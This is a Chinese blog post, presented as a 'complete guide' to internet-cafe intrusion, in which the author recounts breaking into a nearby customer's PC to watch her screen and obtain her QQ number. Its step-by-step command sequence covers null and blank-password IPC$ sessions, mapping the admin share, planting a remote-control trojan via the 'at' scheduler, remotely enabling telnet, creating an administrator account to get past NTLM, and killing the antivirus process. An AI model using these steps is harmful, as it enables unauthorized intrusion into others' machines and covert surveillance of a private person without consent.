网吧入侵全攻略(请勿乱用)

  

 

这网吧还不错.

网吧都是无盘的或者就是xp的,呵...搞入侵可方便了....  


无意的看到13号坐着两MM...嘻....入侵也由此开始了.看能不能拿到MM的QQ号.....偶也找了一电脑坐下..(偶找了一角落.呵.这样比较安全点..)

打开CMD..先net name下看看本机情况

....

WANG05

USER2000

命令成功完成。

我本机名是WANG05.ping下看看IP有无什么规则

Pinging wang05 [192.168.0.13] with 32 bytes of
data:

Reply from 192.168.0.13: bytes=32 time<10ms
TTL=64

Reply from 192.168.0.13: bytes=32 time<10ms
TTL=64

Reply from 192.168.0.13: bytes=32 time<10ms
TTL=64

Reply from 192.168.0.13: bytes=32 time<10ms
TTL=64

IP是改了.记的以前是有一种规则的.比如我5号把.内网IP就是192.168.0.5.

这次MM在13号..IP就不能猜了...不过网吧机器名可是一样的...有路了.

Pinging WANG13 [192.168.0.225] with 32 bytes of
data:

Reply from 192.168.0.225: bytes=32 time<10ms
TTL=128

Reply from 192.168.0.225: bytes=32 time<10ms
TTL=128

Reply from 192.168.0.225: bytes=32 time<10ms
TTL=128

 

得到内网IP是192.168.0.225...

net share 一下,

有默认共享ipc$,G$,H$,I$

net use //192.168.0.225/ipc$ "" /user:""
空连接成功..说明ipc$默认共享可连接...

只是没权限...网吧的登陆用户名全是一样的.而且密码为空.

G:/>net use //192.168.0.225/ipc$ ""
/user:"user04"

命令成功完成。

 

网吧系统盘为G盘.接着映射对方G盘为我本地Z盘.

G:/>net use z: //192.168.0.225/g$

命令成功完成。

现在我的电脑里多了一个Z盘..

现在我们在这个Z盘里新建或删除文件.也就等于在192.168.0.225这个机器上操作了...

 

style="TEXT-INDENT: 2em">这些相信大家都知道的吧..我就不废话了..当然这些还不是我们想要的...要进一步控制她.然后拿到QQ号.^_^........

下面来copy一个木马客户端上去先...由于只是看QQ而已...所以我找了一个

web控制台.体积没多大,205KB..下面是关于webserver的介绍./../

web控制台 (本站不提供此类工具下载)

一个直接在IE栏里输入对方IP就可以控制对方机器的小软件,也就是所谓的B/S模式的控制。用起来很方便,对方运行了服务端后,你在IE栏里直接输入对方IP就可以控制了,也可以通过刷新来实现重复抓屏。

接着

G:/>copy webserver.exe //192.168.0.225/admin$


已复制 1 个文件。

G:/>net time //192.168.0.225

//192.168.0.225 的当前时间是 2011/11/11 上午 11:11

命令成功完成。

G:/>at //192.168.0.225 11:02 webserver.exe

用AT命令启动webserver.exe.

2分钟过后.在IE里输入192.168.0.225.就可以控制对方了...可是偶一会用net
time查看时.都已经过了3分钟了.还是打不开....后来又重新来了一次.眼睛就盯着MM的屏幕看,才发现到了我指定的时间.程序执行时.被瑞星给杀了...


TMD....我说那.

难道就没办法了吗...当然不是...可以换个别的马或加壳.修改它特征码什么的.但在网吧工具也不是很齐全.我也懒的下..

还好微软为我们提供了一个非常不错的系统工具....也算的上是一类控制软件了...

【打开控制面板--管理工具--计算机管理 】

操作-连接到另一计算机.

然后输入IP192.168.0.225

呵.等一会就可以看到成功了...你看到了什么?

更爽的是我们可以远程开启她的服务...在这里启动她的【telnet服务】.

OK了...

本地打开一cmd

输入

G:/>telnet 192.168.0.225

回车后出现

Server allows NTLM authentication only

Server has closed connection

需要NTML认证的...用小榕的那个ntml.exe就可以解决这一问题.

ntlm.exe在《流光》的Tools目录中有的...

没工具怎么办呢..

我们在本地添加一和远程主机同样的用户名

输入

net user user04 /add 添加user04密码为空的用户

net localgroup administrators user04 /add
把user04加入管理员组

然后来到G:/Winnt/system32下找到CMD.exe

右击.创建快捷方式.然后在快捷方式 CMD右击..属性.

在以其他用户身份运行前打勾...

然后运行

快捷方式 CMD

弹出窗口.在用户名处输入user04密码为空

然后

telnet 192.168.0.225

回车..哈哈...拿到shell了....

接下来的事就好办了...去黑基down了一个knlps 命令行下杀进程的东东

copy上去././然后telnet上去.在CMD下执行...杀掉了瑞星的进程

这下把瑞星给关了.还怕他提示有毒

接着执行webserver.exe

在IE里输入

192.168.0.225

哈哈...点那个查看屏幕..呵..MM正在聊天...

好了她的QQ号码也拿到手了..加她聊聊去....

posted @ 2011-11-13 21:24  龙铭洪官方网站  阅读(482)  评论(0编辑  收藏  举报